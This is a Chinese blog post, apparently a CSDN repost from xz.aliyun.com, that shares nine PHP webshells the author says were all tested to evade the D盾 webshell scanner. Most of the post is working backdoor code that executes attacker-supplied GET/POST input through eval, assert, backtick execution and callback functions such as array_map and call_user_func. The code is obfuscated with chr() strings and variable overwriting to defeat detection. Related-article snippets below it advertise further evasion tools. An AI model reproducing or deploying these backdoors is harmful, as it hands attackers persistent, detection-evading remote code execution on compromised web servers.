【免杀】————5、过D盾webshell分享

最新推荐文章于 2024-05-28 14:22:36 发布
最新推荐文章于 2024-05-28 14:22:36 发布
阅读量1.8k 收藏 12
点赞数 1
分类专栏: 【渗透测试高级篇】 # 免杀

0x00 前言

最近在测试过程中遇到了D盾,悲催的发现所有过D盾的webshell都被查杀了。因此就在网上搜索了一些之前可以过D盾的shell,然后将其做了一些变形(有一些shell没有更改),使其可以过D盾。本次一共奉献上9个可过D盾的shell,全部亲测可过。

0x01 extract 变量覆盖过D盾

<?php  
$a=1;
$b=$_POST;
extract($b);
print_r(`$a`)
?>

0x02 parse_str 变量覆盖过D盾

<?php  
    $a=1;
    $b="a=".$_GET['a'];
    parse_str($b);
    print_r(`$a`)
?>

0x03 __destruct 析构函数过D盾

<?php 
class User
{
  public $name = '';

  function __destruct(){
    eval("$this->name");
  }
}

$user = new User;
$user->name = ''.$_POST['name'];
?>

 

0x04 null 拼接过D盾

<?php

$name = $_GET['name'];

$name1=$name2= null;

eval($name1.$name2.$name);

?>

 

0x05 '' 拼接过D盾

<?php

$name = $_GET['name'];

$name1=$name2= '';

eval($name1.$name2.$name);

?>

0x06 '' null 拼接过D盾

<?php
$a = $_GET['a'];
$c = null;
eval(''.$c.$a);

?>

0x07 array_map函数过D盾

<?php
function user()
{
$a123 =  chr(97).chr(115).chr(115).chr(101).chr(114).chr(116);
return ''.$a123;
}
$a123 = user();
$x123 =array($_GET['x']);
array_map($a123,$a123 = $x123 );
?>

0x08 call_user_func_array函数过D盾

<?php

function a(){
     return 'assert';
}
$a=a();
$aa = array($_GET['x']);
call_user_func_array($a,$a=$aa);
?>

0x09 call_user_func函数过D盾

<?php
function a(){
     return 'assert';
}
$a=a();
$aa=$_GET['x'];
call_user_func($a,$a=$aa);
?>

 

转自:https://xz.aliyun.com/t/3959#toc-1

FLy_鹏程万里
关注
  • 1
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
shell 免杀aspx_对于asp免杀webshell的一些总结
weixin_31235909的博客
12-31 628
0x00 前言现在asp不多但是还是有,还是写一篇文章来简单的介绍下asp的免杀吧,相对于php我们的asp还是不够灵活,其中一些思路参考于LandGrey的文章偷偷介绍下公众号:404安全0x01 目录数组函数加密注释符类字符串操作0x02 了解asp一句话ASP解释器还有:VBScriptASP的注释符号 : ' 、 REM 当然如果你使用vbscript 注释还有 和//ASP的执行函数 :...
绕过D盾D盾实战绕过
11-18
绕过D盾实战,想学习的同学。。抓紧,这是一个带实战的视频。更有一个提升。
Webshell免杀工具(附加:流量混淆)
最新发布
Fly_鹏程万里
05-28 494
XGNTAI用于实现Webshell木马免杀、流量加密传输,生成免杀冰蝎、哥斯拉等Webshell的PHP、JSP木马文件,生成冰蝎流量加密传输配置文件。
Bypass D盾_IIS防火墙SQL注入防御(多姿势)
09-14 1225
&#13; 0X01 前言&#13;   D盾_IIS防火墙,目前只支持Win2003服务器,前阵子看见官方博客说D盾新版将近期推出,相信功能会更强大,这边分享一下之前的SQL注入防御的测试情况。D盾_IIS防火墙注入防御策略,如下图,主要防御GET/POST/COOKIE,文件允许白名单设置。构造不同的测试环境,IIS+(ASP/ASPX/PHP)+(MSSQL/MYSQL...
D盾php webshell免杀马探讨
goddemon
07-19 1648
本文章仅用于渗透交流学习,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任最近有在系统的总计waf绕过内容和后缀的绕过,把以前别的师傅发过的很多东西做了一些总结在这个过程中发觉了其实webshell的bypass手法还是蛮多的后缀bypass总结完了经过实战也绕过了很多家最新的waf后缀内容的还没写完东西有点多这里就分享一些php免杀的马全过的也有贼多但是暂时就不分享了。......
浅谈PHP大马免杀之如何过狗过宝塔过阿里云D盾
iphp666的博客
09-17 2869
PHP免杀方法有很多,加密混淆字符转换拆分等等都可以达到目的,下面来简单介绍几种免杀PHP大马的方法,一句话思路也是一样 拿我很喜欢的一款php大马来示范,这个马支持cmd命令,编辑文件不会空白,界面非常经典,最重要的是支持php7,高音甜中音准低音沉,总之一句话,就是通透! <?php $password='haha';//登录密码 //----------功能程序-----------...
绕过waf的另类木马文件攻击方法
蚁景网安学院
10-16 577
亲爱的,关注我吧10/16文章共计1981个词预计阅读10分钟来和我一起阅读吧很久没写文章了,继上次发先文章到今天已经很久了;很久没写文章了,继上次发先文章到今天已经很久了;今天突发异想...
2016最新php免杀webshell过安全狗
03-05
【标题】"2016最新php免杀webshell过安全狗" 描述了这个压缩包文件中的PHP脚本能够避开安全狗等Web安全防护软件的检测,从而在2016年时被认为是可以成功上传并执行的WebshellWebshell通常是指攻击者通过SQL注入、...
D盾-webshell检测必备工具
07-09
D盾的功能比较强大, 最常见使用方式包括如下功能:1、查杀webshell,隔离可疑文件;2、端口进程查看、base64解码以及克隆账号检测等辅助工具;3、文件监控。第一个是D盾的主要功能,后面功能是D盾的辅助功能,但是...
2016最新aspx免杀webshell过安全狗
03-05
上传压缩文件夹里的aspx文件不会有任何报毒,过最新版安全狗。2016已测试
D盾webshell查杀工具.zip
11-24
D盾webshell查杀工具.zip
2015年最新的过狗一句话大马
12-26
2015年最新的过狗一句话大马
PHP小马免杀的浅谈[过最新D盾]1
08-03
这篇文章主要探讨的是如何在PHP环境中创建“小马”(webshell)并使其免于被安全软件如D盾检测。PHP小马通常是指一种恶意代码,允许攻击者远程控制被入侵的服务器,执行任意PHP命令。文章中提到了两种绕过D盾检测的...
d盾asp webshell+冰蝎免杀马探讨
goddemon
07-19 2260
正文asp免杀的手法其实也蛮多的个人理解其实免杀核心就是混淆+改变执行顺序啥的。对于asp而言,前者的利用特征这些进行绕后者就是利用函数数组+类的手法个人后者的手法用的最多一样吧这里先扔2个bypass的小马。...
一键免杀D盾(免杀一句话无限生成) ——yzddMr6
yzddMr6的博客
11-06 1615
前言 最近逛帖子发现好多人还在找各种免杀一句话。。。 都9102年了 都不知道有webshell-venom这个东西吗。。。 看来我的宣传还是不到位。。。 再给大家介绍一下吧 项目地址: https://github.com/yzddmr6/webshell-venom 蚁剑插件版: https://github.com/yzddmr6/as_webshell_venom 自己几个...
渗透测试-过D盾一句话+上传小马
lza20001103的博客
08-29 1341
D盾一句话+上传小马 文章目录过D盾一句话+上传小马前言方式一PHP一句话马方式二PHP上传小马 前言 webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。使用方法简单,只需上传一个代码文件,通过网址访问,便可进行很多日常操作,极大地方便了使用者对网站和服务器的管理。正因如此,也有小部分人将代码修改后当作后门程序使用,以达到控制网站服务器的目的。 方式一 PHP一句话马 1.代码 <?php class
绕过D盾一句话
Home to come
04-16 1061
通过网上各种渠道搜索,我一共上传了16个php文件,只有两个文件成功绕过了D盾 1. <?php eval('' . get() . ''); /** * @return string */ function get() { $get = $_GET['password']; return $get; } <?php $a=1;$b="a=".$_GE...
打造一款1kb大马并且处理D盾以及安全狗拦截与查杀
dfdhxb995397的博客
10-26 190
在之前sky666提到了关于大马被waf拦的问题,我决定手动去过一下bypass。可是发现怎么也过不去查杀,更别说拦截了。对此无奈,只好花了个通宵去处理一下。顺便一提,理论过所有Waf,并且被杀只需要稍微处理一下依旧可用。 Prat 1 目录 一:base64编码,处理eval函数进行绕过(失败)二:巧妙利用fopen函数绕过waf三:fopen函数处理eval拦截问题四:对此次...
php绕过d盾,巧用匿名函数绕过D盾
weixin_29801567的博客
03-16 530
之前看了smile大佬的webshell绕过,跟着smile大佬的思路,自己来挖掘了一下绕过D盾的方式这篇文章中,smile大佬提到了非常多的绕过D盾方式,我就不重复了,我在这里主要是利用了匿名函数来绕过D盾在p神的博客中,找到了这么一个图片对常见的webshell进行了一下分类,我主要是利用了一个system 构造了一种命令型的webshell,匿名函数匿名函数也叫闭包函数,允许临时创建一个没有...
免杀webshell
10-17
我理解你的问题是如何编写一个免杀webshell。这是一个非常敏感的话题,因为 webshell 的使用可能会导致安全漏洞和数据泄露。因此,我不会提供任何有关编写 webshell 的具体指导。相反,我可以给你一些建议,以帮助你更好地保护你的网站和服务器。 首先,确保你的服务器和网站都有最新的安全补丁和更新。这可以帮助防止已知的漏洞被利用。 其次,使用强密码和多因素身份验证来保护你的服务器和网站。这可以防止未经授权的访问。 最后,定期审查你的服务器和网站,以查找任何异常活动或潜在的安全漏洞。如果你发现任何问题,立即采取措施来修复它们。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值